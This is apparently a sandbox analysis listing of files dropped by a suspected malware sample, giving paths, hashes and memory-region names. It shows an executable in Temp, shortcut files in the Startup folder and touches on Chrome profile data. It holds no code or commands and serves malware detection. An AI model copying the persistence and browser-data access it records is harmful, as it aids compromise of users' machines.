MD5 dbc0d689e717e5837253b6336f11511e
SHA1 3b29791044095ce69c0141b28feedd695157f761
SHA256 e6bbf5cd1ff959ca4d92724cdac11d7f6ef2aa855a174dc6e6e0a407df5b3cb4
SHA512 b1ad6537ad14b6f23ae11a693639bf7ab10375bbf20cb37c546a87719c0165b81dc15d5645701b92b81e006ef151c987aa53e7f594002088ae0d2a5bf1d52bc2

\Users\Admin\AppData\Local\Temp\System Settings Broker.exe

MD5 199b197d72e5b27132a9a304a5b0569a
SHA1 18d82a2c81fe604cfe6639aec149965221b96903
SHA256 910722e6a3dc31d13092e48f7a506134da9683729e245da9a1658ddb6f45c315
SHA512 d4e5a06175939ab7359c504c612ea11ce986b86fd69c1e1b316052e1c33cfc5d394a862a66dca22e3a0c509dccc3eb52d2f2bf4caed95afb01340616ae4195d1

memory/2600-137-0x0000000074BE0000-0x00000000752CE000-memory.dmp

memory/2600-140-0x0000000004730000-0x0000000004770000-memory.dmp

memory/2260-139-0x0000000004E30000-0x0000000004E70000-memory.dmp

memory/2600-143-0x00000000063E0000-0x00000000064E0000-memory.dmp

memory/2600-147-0x00000000063E0000-0x00000000064E0000-memory.dmp

memory/2600-146-0x00000000063E0000-0x00000000064E0000-memory.dmp

memory/2600-145-0x00000000063E0000-0x00000000064E0000-memory.dmp

memory/2600-144-0x00000000063E0000-0x00000000064E0000-memory.dmp

memory/2600-142-0x00000000063E0000-0x00000000064E0000-memory.dmp

memory/2600-141-0x0000000004730000-0x0000000004770000-memory.dmp

memory/2260-138-0x0000000074BE0000-0x00000000752CE000-memory.dmp

memory/2600-136-0x0000000000DA0000-0x0000000000E32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe

MD5 4f40277927e2211db8747191eca94734
SHA1 cea51b3811bdf2b8de78e22396a59fa4edecb718
SHA256 9d081d8d145cd7b8acb27397b736c185dd72cadd8067e3a45fd346d819d5f098
SHA512 d54a75487796f942a6d78868b1682ca808f62d93610662e2a23b92c50d819afb10aa6022b18c3d95ead9d0e08c27efe2f7fc17a8b2e38a1f88ef1d8921a74060

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.lnk

MD5 7cbc2d82c4f90ff978979a21634aa85e
SHA1 cc595afa4a2f17360b23218aa002e3e31e29b408
SHA256 21f7e2b15bbe313f5bb49f27e5a11296c63cf26c625e2da423b1e18df0bbb5a0
SHA512 3c11f0c560084e7e85183a0d28463308ce9df197616c36b1a6d912657364e9f83730c82b94673c8bab4130c26c417ff668b3a19abccfb360855d2d374ed8ddff

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk

MD5 406cb5d8884554b910ec2985051e04b9
SHA1 6c2caa778ff91890041c687a8f0d7bfb3496c72d
SHA256 6f65ea8e387ca72e00d035cd0c38570a196414187ff069577491764e1f601bd1
SHA512 2f8418c76878a6e1dec7fe2ce4e7f47734cd01e9a8c812995263e5f57a67adc4761923a2c00a9cffecec73b2080e8f03c6fcd07d6d18b5c0154cd2542f02a182

memory/2600-203-0x0000000074BE0000-0x00000000752CE000-memory.dmp

memory/2600-208-0x00000000063E0000-0x00000000064E0000-memory.dmp

memory/2600-207-0x00000000063E0000-0x00000000064E0000-memory.dmp

memory/2600-209-0x00000000063E0000-0x00000000064E0000-memory.dmp

memory/2600-206-0x00000000063E0000-0x00000000064E0000-memory.dmp

memory/2600-205-0x0000000004730000-0x0000000004770000-memory.dmp

memory/2600-210-0x00000000063E0000-0x00000000064E0000-memory.dmp

memory/2600-211-0x00000000063E0000-0x00000000064E0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 443cab59aa484e6181cdeecbd045bdb7
SHA1 faef19416fcbdb846186b106feb01e5c8b47808a
SHA256 e2e3cee62e89c07bbf6d067245996a05be932d66a861393390294f54e1b27cbf
SHA512 ecafd83adcc0933f19473041cc1100c891bca869ff80a3a41faca980171e767c05484df5b0994ef77c59dfe455a6baef07cdd078519ec6903dab2018d2c9640c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1686d34cb8a3d393fb8eb67c1fa76ec9
SHA1 891c8efb333cfb1c39a0f76ed371f273e664ec14
SHA256 a05d427c74d90b4e323a8548c854a7404a23992c335c14365d51003f2f1618c1
SHA512 fd8de5f8e911ebdc5d4812402cc1e04b8f63cde51ff96d47662c2a6e0ba86dd07a7b94b7f0e5a75489f7fbf3b8334291788a4ad37cd4687dd85998224e87d3ac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT~RFf76b77d.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 be12a1e3ee468e4b809cc7d8e0607281
SHA1 c13f15f205c5446f35232be777ea49051f3a0862
SHA256 152672ea8149fa8da359e6a2bcfe09e33cc072411e36b46ee84c393cb65036e5
SHA512 b2b083816203aa0aa496145f1dcea83aeb147da3d6892ca6c35bd8c68e255a87d492cbd695c6d01fd799b8df483f92fbae29d04ede5bbb041f92dd1e6a7ca146

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000011

MD5 de22812d28b754bf465ec30354dc7c0b
SHA1 b64424a6d4dac6f66e9e367e587b4c7a26c92409
SHA256 3fc50670c4b25b7ddab9ba8498763fa9c51a769659e5cf6cc008fa8a344c8f87
SHA512 881042d92476d51db62f7ff1c3603cf4705df6fa0e39aa2acc42d5c08f0d12fc74f3b38517c9ee2e5c9b72fc35210035736f7fabfa36b2b03e6e2bae3e16329f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\e658aad5-d7b2-44d3-9f2d-ba4596698b61\index-dir\the-real-index

MD5 25390dbe30323881c583ea977fe278bd
SHA1 a4a51cdd77a2c3c4dff5d6d1df3990822ac21102
SHA256 4b6f91dfd14ae1ada70ac364daabcd67368d2012be763e8b0d8748fffcb33aa2
SHA512 1480a789a4572c443fe21feb6e6e4211c1fddcb885776c71ca711ec6f430c3dfd6e7fda24484f476271b1bd9d58cc27bb2daf8a7726aca480c97835732205469

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\34a2939c-42b6-42ef-a9b9-577ca00f609a\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 fbd3e49426d6ec58a2e01e7af0f7be45
SHA1 3c5f35966df403a1d5228950cd4778cc0847a93d
SHA256 02427925f0b7b34e9bbe5c8d5dcd76ff7df7d32c77673074edc090cd7551e698
SHA512 c46fddb88b194bc4c51398b55373ebed7b7ecb1bf86b93cd72be88b152f639ab75eecd1dd768877f801021f7c74c65ef9f8f81bf4ca566e53afecbda17691303

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 d9918120b6440549eb3de401c1a6f2ec
SHA1 e86fd510baa3efb987bc8386d4cbddfac5e609f8
SHA256 b896a74f71655eecc4c37eeafb66e8d3c7815d391347e9a24d1886baf3808dd4
SHA512 a03a061cd1db7c3501b3240eb3c591f9bbaed2b0da6af4b43459dcead95822afe91b8770584c4fc87bf209c4a89d3aaf87aa7f1a50397ab6a9a1ce87ea940a1a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 6e9d3517ab9475fb0b537aa7c6bbc02c
SHA1 239b545e4cab8c85b6a4bdae6419526b18f088d1
SHA256 0a696c7dac5c5d4cf7a25e7fba5970ce4ef7dcda0d7cd7ab6e2e1436ce2d7aed
SHA512 41bbb983477af460f80be8235c5bbb4931b88a9bab1711da36e26fae15d2c30c2f47b49b821a2581d1dfc111b392a361153f790a0c7f70e9232ebdd552708f67

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 c4c1edffba8e83adf4b8aaadd7789726
SHA1 f81c39cb9266fd5c65fd643bdfdde82070d19075
SHA256 993d371ea9f94f9efe4bb4f55bda407f93648f790e9df74a2e963f4273ca3010
SHA512 0a6b4d8b82245645b2762eb3ce3ac92ccf904ac9b9e73e9dc31414bbea5b08b3b86537603ad79e0f86ef884dd23ccd10847d78d107734d92735d70b545e9ff2d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000013

MD5 ee7eeb5e3d335bbd398e37f28f144bd7
SHA1 50b3fa066777a52e47b48e5c665488c42b2991a6
SHA256 d4854afe49dcc79bb2885b92ec0686a4ac590d9fabd8806387967f340b01b734
SHA512 be791ae10b32b095bad1db7651c8e6fe8a88fb78a304397161cc46490b4d92bbe20f6d5c8c3dedeebc9199e432f9d1d8fb149caf056ad2aaf43e6223b910167c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000017

MD5 2d7f914f033f36561542f191cc061328
SHA1 c2563202898e80c85e46ab4fcd0da92239fc0972
SHA256 eec0e78a060f63e5f89da3a327bde2bf72e02d2a3e6cdcf7b27e94d7f5db4500
SHA512 1c1c73b46c7268f4ea54c59e502fd14a5c08cf8d0ddc0315956b4a99cbe439d922b6b7dad54cf57dac0c55f47297f7a18a538a2edee458497ac4e298be0e4bcf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000016

MD5 44eb0f2261378f30a222d785ae83400e
SHA1 344d7733ac4bd50559b90b4e4c33747f589df90e
SHA256 d91d299a09f4156740511447f83ca0adef92ae55740a6afec108bb57dc56b5cc
SHA512 aae1a7974dd33a2e8948bb8617bd89c8c4c6af36517212cf7fbc6155189840caa02fc2e09164775774774af16bf5e7ca04ba652365f641679495f9c0983144b6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000019

MD5 b6f910212e3c1be7ed11fb8f0f100923
SHA1 6a6d958950bf46c1474652eea04e8dc125fabfe9
SHA256 50fec1af95715bc5ffcba44a35452e11961f8e2b95b6179806d27cdff52a94ac
SHA512 158d61c5cf6da37cffc9d257700bf991dd5dae386b2d5c73c9b49ecc772f1c02d344e7b0889f2fb6667e26e0a87b36ecc24c4610462dcd2210aaa5c5a1731ea5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 db7af8af51abf71abe71ce03c7a4b12c
SHA1 79739861fde67a245c5a763700a3f2123f989a63
SHA256 c28c6b0d28da1c1403ee7a092de59cf2c219570b7d53fe0893231fea4da4eadc
SHA512 fcccd3ffc3bb145169e6f6236080458888e8c49640c31b718cd1e86c749c733b470aa2f95612eaeb5f5e23b61dec85eb173d33e8802aa8153120b8ac5f58d2e9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 56bb6c6e8cf772612148811af08a3499
SHA1 3c22ef41f33c1f48aa7d5b15ad5292ea8ac3e81c
SHA256 3d832d9b19573bb9a9092bfa169ab0c291b73e61b17c0fb5979275749bf21268
SHA512 5d8b50fda9650c4b2675d1e07067a71ecae804f757ffd3f9c1eb342db6ea3dc411b064978b10c2b163ac7544c86ad7deb5ff4a7ae8bad92a8da877c3e2bf7a71

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 4379c6511af8a70c5eedddc659c62644
SHA1 8deedeea32a8c4e1a52cbb1abc4aa18641bcfb63
SHA256 1fcced571ecfff580a9f1d61e455c9ca8f55db8ee264c0fb2c7aa24405397c1f
SHA512 4f402133e84b49bdebdb95696e40b48aad85353c871647cb607748fd1d111f40098b6ae1df93d7d8846198ddf7601e779a71326d2e978e969b1936b9ee801129

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 ac6e4ac23bbeb30d105c4dbce2fcbae9
SHA1 96c6de2eb3399c6a804a75947a9351777e11c065
SHA256 7695255e53882991119d218e097991527a428b1981687e904225ece46e0fcf4c
SHA512 ee519059a9a77e92720e30180d093e258b8b47b9484edcd21be887354d1bb02cbdcc0b7a1dbc33633ce7c0deda317c2d2daa42497f1fe114d54f00d006a47d50

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 0ca232abd79b7cc866aabc709991df34
SHA1 b7d1019652c7320b19b8b22fc185a54b5053f057
SHA256 fe5fbcf80b4b070070cf3d52304f7b0adbcf8defac2632e1463ae8aa03bbb069
SHA512 b22c2d36a8c472940f24b1215a45455022564fe042f2e5c5f25533ea7cdf6b758f967522a3931d1ad56f2286227636ae6ecef4a38dd3892a574836a7b8ea2b44

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 f32695922718e9aa279dddc933267d61
SHA1 6cc867520d1c2e2adb1e2616ba7a8330000bd514
SHA256 99269cf985ec6d4263de311174a434f156ecd79f92c0b0d463296451ee9619db
SHA512 b005db76fc365d89175e44fdf9a01b9365f6e0bc89324003a8785a0111e002992001fba06ad027d67bbbef30ba352f3cd630da5be2d0503ec5c71fc72f87c1e6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

MD5 929729aa7cff46b3dad2f748a57af24c
SHA1 81aa5db7dd63c79e23ccd23bf2520ab994295f2e
SHA256 3c63e6c7fa25849799d08bf54988bfb3b77b1d1eebb1e55a94b64995850cba2f
SHA512 a10eaa6f2708b683bd43295b9c3da5840c0eb6d8a6b9e1922a534270fecbc0dcdb4cdcc28768df292a06f6210885b510254bdca17e5b3c507b0337fe7dc3d743

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 56dbe920cdb0eafedb6f8fe5e89156bb
SHA1 99d0cd3d732fff6322087fe715e0cbae232c3548
SHA256 4f56e592541618cafa51d0f55072eba5d1408180ee44731d96c0ebad99432509
SHA512 f98080b4012001da00a6ddce8a6c43da0543d16842430ee7586c33b0c977e706a386bfa49543ac21256ac50bdd52d39496ca5bee7806bde1f7617a00afcee564

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 d24adbe5609ab80d8324cfcbf1aaac97
SHA1 2dc2e69581d7df9ab29b01a7d0c0c62a725066a8
SHA256 406397b79207f3eef1f08e228639e36896389627318b11fcff29686c1fe08ee2
SHA512 28ddddc67a7e82c946aca1633378bec3fe60955491672e9a9b1ff15f393ff4d7fe585cd6db5e8d46e11df617a5f1043d30a33de0adeed84e78d503db3e211287

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 4593810d25b97293b68282fa771bf799
SHA1 7a446ba6886cb99f50b24f69d467ac223c9b57d8
SHA256 70746cfe22ac218d971eabde5b9350ffd6b21f39be007cc15be099e33629d3b9
SHA512 d5fabd7923d9148655764b36b5aae0f601f985b23c5c006e56671a53068048418d8246da336d5d58197214aaa282e2fc1dc9b6c880ca6737c510c6111d2489b9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 79e38bd6137f5962b1b5467c28c0f91d
SHA1 fa1030b37059bc5fc7b4978ccfbe056a718ce404
SHA256 92f96fe97c4c7d8484883cfa8b0bf25c35b6f9ace68ab55848d2847bdf42bec9
SHA512 2b39bfab4d7aa6bad30b9277cb6b3849d5a330c50a0c1955df408a3f76ef9bf14464eeb7c5a1a8fe100cb610258ad0bb9e4ee105729f1ee5db97ad7942adc1cf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar24F3.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a3e276e30a9b7b4adb43643b9f85d2ca
SHA1 14c636c34f020c30102c49cf4f7547d211375e0f
SHA256 aef52a27bfacd063497f95fa5786c42924ec7c765c4edaf9628280955a9d1668
SHA512 69462c22d938582158bff21be6b97d1d585b56a5a875a5bd4ab7bccd4cb36ad664b27b8348a909e7999c9ca460775a4d385c1c738ffe5b310361b4271ccc3819

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3f1cd0f9af146216e3a4344bad29c359
SHA1 c1b7db79bd9858f88d4b47a2eea30fb2501ccf70
SHA256 96918dbd5d440544cf5254307d827381c0ca91decef2d88ce1a5f2f12c510914
SHA512 96118ab7e2a6cab8685929c7dc7aa7df2d819abc2424c6f61c261dd56acd5f46f425eab8cb859e6e58f10fc1e8f12573ff3652f7a0c3d6deb4810088734c95dc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 b8e4724351a78d1e95e760e90e697c1a
SHA1 faf655f34fd78089e67464b5d53714afaffc3b8d
SHA256 fa2c2271ea980997e623dbe78159fd723ab58649f273fde734d830e7ced1365c
SHA512 88ca5c3a03e61e96b9e99b8aab96a70b442d601395fbb538a679e2fd95af177d69d8875135a18da504e89371d88c11d9fee5c55f6c0ffa298313912d6d2d331f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bee675c6713285cb03da85133f5c21cd
SHA1 0c6051f4bd1502f34251eb942b49194ea1f0600e
SHA256 ef0e7368e14decf99624375d82f75937b39045dfee77114fb4145965b2e94cc2
SHA512 f36fb7a5e6c658c31c16245b12a96d558736565e92d4861a57ce4bc6726832683284d142d211ae78199ffe102bcdc60b40a3467cbc5f3a89bb24900e8951a7f4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 72bf9da594b98f287ed3f7d478a80b31
SHA1 a4f927494ac7a1930d3de4ed3a4b574fe415f086
SHA256 68b709582627a758ae46d961280d25061beef22833080b5f3b6257ce681f5801
SHA512 9a0a0d880297a766e19d69a29f30e5c476e2e0c5682823655a98ecb335732f8c92451b81dfb93807196e9e9ffa06f18c3a86c166c10e9499864f837f0937a65c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 735ded6ed922ce7b5fa0da3956cd01b5
SHA1 3bcce50ce0e90bdadd619889a884ed8db5a90553
SHA256 173eb76e94df4a684e67934da53cd54349407b3add12068bed2950a459f19ad4
SHA512 54b1eb3ace0613e572583ed264cb7ca31dbbd2d233e2b47e56094c1a927ff264930a33dbb01c028e777175a82f17e5035b8a8424eaca7ef5744fc78ccb4d8bbb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 07dfbd7d9ff67ac5f35dac2428aaddf7
SHA1 60cf5c108f57c2211e844b640f6473b0d587c279
SHA256 cc199ca907bbe50ed495e0166eb9126f79aa966100498238b2e2aff2562dc593
SHA512 259a9c84bfdecc661301b6bc50462d767f671a36d9d65fe88e84ef44c21f01196d4c6845767300efb83019af7b875465f4a4219f6b2240d6b66a57cfa78a544e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 d9fa5e9394df0c011beff583efbeaf1a
SHA1 afceaa1b3dbee0705dd4bb38c884acfc8a366afb
SHA256 d4a8f3e203eb0600084ee4b48e5f6fe66046f6a443260843f29ee9a6118ae117
SHA512 97aebb11f6d3f6566a42cfe2417e5667c6903c4b4a707cdbdd4ecaa6a2f9876ec766f8c02af525eb675cb77942ac4c1f684d99ae0065843774cbf25f2bd97d17

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 5d57b2af1824f206c42b6417c1cc0820
SHA1 739d3ccd86503a9aadb26dcdeb596dbc8eb8f6bf
SHA256 a0ce6126b221f6c2459dd696b039a3bbbcc8f53fb3d6084b14dba4c751821f28
SHA512 3cb7dc57defdbb93f9e637b5f6d078e58af2a8987c380bccfc1fc4a0d7233d8d0203764d49c187a2b416b72aa92ebe9dbd855e2a7074701612d80e66ff78fa9d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 a6edc91af90bab3ec3d864059617753e
SHA1 24467a54e8f5955a9bb159e97886433bded203cb
SHA256 8e999e72b22e0d425551839cf22179e2b27329d08ec31bb94894915f18125ef9
SHA512 e3c8dca9ada048412942bf08a749c00e2a453912ed34d692969f003bf454c2583b3718860325ee9dfebb38414125e58f81a049a99c1dc43fe89a684f3183606b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 4b528eea4ee16c8464c6b116cfc63e2b
SHA1 3e2c0bbe7469d44fc4497ffdd5ecb21922d86b25
SHA256 255bf822f3d8eb76859f15d27d4f67114fb6715f42d7ef0344506e635423ac6e
SHA512 51ed5498147ebfba3ce48644ba6f84d1fccb628676c73bb7ffc772f844325d51a341dfa83912d1007ffdc7f750dd906320b3f8b8ee7a875edd520a0e638372f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 99e233e3c8692ed420d054ae2bccc7ab
SHA1 d31ef63fe3b17631ab8abbb8bdd6403aaa70dc24
SHA256 9b24bc09a8cff31b2169ad1b4cde2372dfede5cae2b21a69284c0dd30fc7702a
SHA512 77ad8b6ce13a098aede7cc7eff213c34ad42dc4e64ce93ff9efee8dc07606471402f326f61720040c5b5ed6736a291ec255f163cb37a388edd07fb883e564b62

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 0ab26c4b5db8a34773f603324214ec65
SHA1 af5e97600a8ef6edaa941980a3d4f95c0027292c
SHA256 219498c1f5dfc90ba9661a64c7817ce79bdcc45095d6370b346d877aeaa6fb7d
SHA512 72a987906f0a14ac56fc38ad97551533d76d626a6687337950bccafb5eb85a1b56a8db92e2261bc240274c81c1d800781146dfe55b06b3b25fb40afd8b032e51

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0b20321bb509d115422863b2b3423a41
SHA1 930abd8cfcab72e3262d1e10e04af1269b54597e
SHA256 6002b5f8029f7ebc7084c0060a0524b34cafb5e4336558a745385018806ebaaf
SHA512 7c7eab3bbe7e306ed641d97d1c91f510606e799b69d83e82e34984e2b16a5ddd6adad08878ede6a630606a4fea81a1aa5ae238d4f9fa26b83f16e35de06d4fb5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 35a44415548896fad9c154a957cbb673
SHA1 d26fdd45c69125f4acbcb3a8fd50226abd59a059
SHA256 6dd172d522b495b456bbb2743c78952a980551fdcd6587944f3449ed8afcbc4f
SHA512 6da3057ffef17d0dac7a7b917c4be852f88ef356b5832613fc51bf2ae8917f9974efc706b21367593a468e2917761d881b9e3ea08f3027195919a1832029d8a7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 c965068c78efcee27c8d0adc4214f954
SHA1 1ce9ac176ba06363ae509ba5f042d3be3239c42a
SHA256 7fb9e6478686967f89e1040f67464f89e463e32350d02b9a6eb4827e893537d8
SHA512 48e9be1ff71de2ba3d7c671758ef5899b8635c2a927cef528c61d1d148499547f8aabbcf8eefb24197c53bdece2814fc3cda58ef58f9611e8faeaf7ca7f4b403

C:\Users\Admin\Downloads\Creative EAX Settings.exe

MD5 d6da8ad224d6200dd5662644858b12c7
SHA1 658824c4434292dcd6601a7100c3b68f6b78a973
SHA256 2cf147182fce3b86da3a4e63688b39ac30e47956ce5b01c2ffcc3c4243526b5c
SHA512 91c0aab428b238ad00d3ceb94645de5b94a74eb15ce57d3a5c544f56c65ab5a00b74d6a67fecd04af9a2193f6ab8d3e87f1c3ec24337b5bb86905e0ea7535b83

\Users\Admin\AppData\Local\Temp\nsa475.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

\Users\Admin\AppData\Local\Temp\nsa475.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\nsa475.tmp\7z-out\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsa475.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsa475.tmp\7z-out\Creative EAX Settings.exe

MD5 49496932dbf79d7dfebf310866e184b5
SHA1 ed0c3dc5c428bc8d62294473a106e77f40f3cc87
SHA256 9095baf6cc6de46da8d156a3e270d07642d9e8eeb6b39869fed462627e9044e3
SHA512 ac7c8b4d2754d6ce701012baba83d72e629a94fb23b233dfda75eb0c6a452fe73145adc3ce4273c01d3a0aa264a48367ba05de63ef56bc15012c50b37a70ed88

C:\Users\Admin\AppData\Local\Temp\nsa475.tmp\7z-out\ffmpeg.dll

MD5 c3842fb3087cdcdb04020ac38683c289
SHA1 329dbcd4a1c79b891b200f11eb50194b85c493bc
SHA256 e79792af338d61424bac87a19c6f34f3b4bc1382345633b8d509253a0a6c2133
SHA512 069196b8006e908954e7ab16131a0d10889a0f7517eaab2423a82fe49fb9b045c0d95dbf7c08c10ddf1a21983aea4a0d207decf91baacff0884511589a57dec5

C:\Users\Admin\AppData\Local\Temp\nsa475.tmp\7z-out\d3dcompiler_47.dll

